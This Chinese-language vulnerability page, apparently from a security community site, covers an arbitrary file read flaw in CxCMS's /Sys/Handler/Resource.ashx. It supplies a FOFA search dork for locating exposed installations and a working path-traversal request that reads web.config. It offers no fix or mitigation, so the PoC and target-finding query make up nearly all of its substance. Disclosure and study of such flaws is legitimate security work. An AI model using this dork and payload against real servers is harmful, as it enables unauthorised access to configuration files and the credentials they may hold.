CxCMS Resource.ashx 任意文件读取漏洞

漏洞描述

CxCMS严存在任意文件,由于/Sys/Handler/Resource.ashx页面_FilePath参数过滤不显示,可以读取系统敏感文件。
 


 

漏洞影响

CxCMS
 


 

FOFA

"Powered by CxCms"

 


 

漏洞复现

关键字"Powered by CxCms"

图片[1]-CxCMS Resource.ashx 任意文件读取漏洞-孤勇者社区

验证POC

/Sys/Handler/Resource.ashx?_FilePath=../../web.config

图片[2]-CxCMS Resource.ashx 任意文件读取漏洞-孤勇者社区

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞12赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像果严0
    • 头像出张0